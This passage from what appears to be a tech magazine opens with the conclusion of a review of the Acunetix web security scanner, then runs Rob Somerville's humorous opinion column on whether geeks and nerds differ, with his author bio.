Conclusion 

As I mentioned earlier, this is the first opportunity I had to try Acunetix for any length of time. It has all the features and functionality that allows the product to compete with the "big boys" in the field but is also reasonably priced. Acunetix is a solid product to get your Application Security Testing program off the ground. As always ensure that you understand your SDLC so that you get the coverage you need to test. Acunetix has also recently released an online version of the scanner for the audit of public internet facing Web Servers and Network Interfaces. You need to check yourself (so follow the link in "On the Net" frame).


MICHAEL ORTEGA 
Is There a Difference Between Geeks and Nerds?

Forget the Internet wars about vi versus Emacs or Windows versus Linux. Burr Settles has analysed the language of 2.6 million tweets to attempt to answer the contentious question "Is there a difference between Geeks and Nerds?" Let the debate begin.


Having read Burr Settles' analysis of the data, watched a number of video commentaries and consumed quite a few articles on the subject, my personal rating is very probably "Gerd", a mixture of the two. Whereas Nerd is always used as a derogatory term, Geek has a trendier, more metro connotation although personally I still strongly dislike both terms. As an unashamed, in-your-face Gerd I would like to bring some peace and unity to both camps — we share more than our critics would like to admit.

One word I have continually been described as throughout my life is "Deep". I suspect that term has been applied to both Geeks and Nerds in equal measure, so I am going to tentatively suggest that we generally have much more in common than we have differences, so rather than type Geeks and Nerds throughout this article, I will use the collective term "Gerd" from now on. Of course, individuals will rate differently on this spectrum, but I want to examine our commonalities in light of the social majority, rather than bring division — after all, society at large is rather wary of us, hence the pigeon-holing, name calling, and the tag "Being different". Fear and insecurity is a very strong motivator in the hive mind.

So let's get back to Deep. My wife has accused me of it, some of my colleagues at work have, and very few friends who know me well would tend to describe me any other way. My immediate retort to this is "Define what you mean by deep?" — which in a paradoxically, holistic way not only challenges the person making the assertion, but also answers the question. Gerds refuse to take things at face value, always scratching below the surface. Some are content with empirical evidence, some are less satisfied with classical definitions but the resounding trait is to ask questions and search for answers — and quite often questions that are taboo, impolite, or just off the scale. The point is that we have learned early on in life that most non-gerds tend to live very different lives than we do, one of the major traits being that we live in our heads. While we really do enjoy social interaction, it has got to be based on quality and interchange, rather than superficial social convention and a pretend mask of civilisation. I recently shocked a colleague at work who asked [in social niceties mode] "How are you Rob?" and got the blunt but honest [totally fed up with BS mode] "Rather p*ss*d off" reply. I did apologise, but it goes to illustrate why Gerds are classed as socially inept. I should have just smiled, said "Oh so-so" and not revealed my true feelings, but society dictates (at least on this island) that you wear your heart on your sleeve at your peril, stiff upper lip and all that. To me, that smacks of duplicity; if you don't genuinely want to know where someone is at, don't ask them. Sure, talk about the weather, the price of fish — anything — but please don't place me in a position where I have to effectively lie to you as it makes me feel very uncomfortable. On the scale of 1-10 of cardinal sins, our social interaction "sleights of hand" may be insignificant, but they are cumulative. No wonder we live in a society where the culture is so superficial, true education and wisdom shunned, and people feel disconnected and isolated. Most of the time I join my fellow conspirators and "play the game" but it does nothing but reinforce my belief that the majority of people (outside of the Gerd community) walk to the beat of a different drum.

I believe that all Gerds feel that their value systems have been betrayed at some time in their life. Maybe it was totally believing in Santa Claus and discovering you were — whilst not deliberately — effectively lied to (my first personal recollection of worldview shock) or maybe it was just being clever and different in an amorphous peer group. With large ears, thick spectacles, and a comprehensive vocabulary at school I was obvious Gerd material. The favourite insult thrown in my direction was "You swallowed a dictionary?" (My 14 year old daughter also accuses me of this, but having chatted to her about it, there is a secret pride there in her old dad, so I don't mind too much). This fracture in perception, the understanding that the world is a very different place from what we understand to be internally, is what makes Gerds, Gerds. We withdraw from the superficiality of human interaction with its movable values and eccentricities into a more clearly defined space, where the rules are more easily learned and rigorously enforced. Take computing for instance: no matter how much you yell at a computer, or how expensive your suit, or how important the deadline, or how much you love it (or lust after it for that matter) — it will not work unless you play by a strict set of immutable rules. Try applying that methodology in the workplace. People get promoted on the basis of gender, looks or connections; they are fired for speaking the truth. The power of personality rules and corporate culture then becomes an amalgam of those who most effectively play this very subtle game. In other words, success regardless of talent, experience, logic or knowledge. No wonder Gerds retire to a quiet corner with a thick book or a green screen terminal and a tape drive.

Society has this pathological addiction to classifying and judging people on such superficial metrics as looks, fashion, intelligence, money, education, race, nationality or gender. Like everyone else on this planet, I am a unique individual of value. Treat me as such and do not fold, spindle or mutilate. Hence my pungent distaste at being labelled a Gerd or indeed "Deep". Please feel free to categorise me as such, provided I can categorise you as a living testimony to a grey mush of social conformity. Unless of course you are a Geek or a Nerd, in which case I will take it as a compliment from a peer.

Ironically, my employer is sending everyone on a diversity and equality training course, and I have prepared well for this. My Unix beard is long but neat and my hair is just long enough to form a decent ponytail. Maybe I should just hand this article in instead.


ROB SOMERVILLE 

Rob Somerville has been passionate about technology since his early teens. A keen advocate of open systems since the mid-eighties, he has worked in many corporate sectors including finance, automotive, airlines, government and media in a variety of roles from technical support, system administrator, developer, systems integrator and IT manager. He has moved on from CP/M and nixie tubes but keeps a soldering iron handy just in case.